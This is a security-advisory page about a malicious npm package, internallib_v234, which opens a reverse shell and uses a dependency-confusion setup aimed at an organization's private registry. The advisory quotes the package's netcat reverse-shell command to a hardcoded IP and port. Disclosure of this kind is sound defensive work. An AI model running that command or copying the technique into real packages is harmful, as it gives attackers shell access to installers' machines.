npm

internallib_v234 @1.0.7

Vulnerability report · Last retrieved from osv.dev July 6, 2026 at 10:15 AM UTC

Malicious

OSV ID

MAL-2026-6796

Ecosystem

npm

Summary

internallib_v234@1.0.6 exports a command() function whose body unconditionally invokes /bin/bash -c "nc -vn 10.0.74.133 13337 -e /bin/bash" , opening an interactive reverse shell from the installer to a hardcoded RFC1918 endpoint (10.0.74.133:13337). Prior to launching the shell, index.js runs whereis nc to confirm netcat is available on the host. The package also exhibits a dependency-confusion shape: the name mimics an internal-library naming convention, it declares itself as its own dependency ( internallib_v234: ^1.0.0 ), and CI configuration references a private Verdaccio registry ( npm update --registry http://0.0.0.0:4873/ ). The combination indicates a targeted attack against an organization that hosts a private internallib_v234 internally; installing/loading this public version and invoking the exported function yields interactive shell access on the installer's machine to the attacker.

Source: amazon-inspector (8af2fded6fa5a25932255b36ee1a4e4293d955d9a74d54334ec133105f3ec087)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.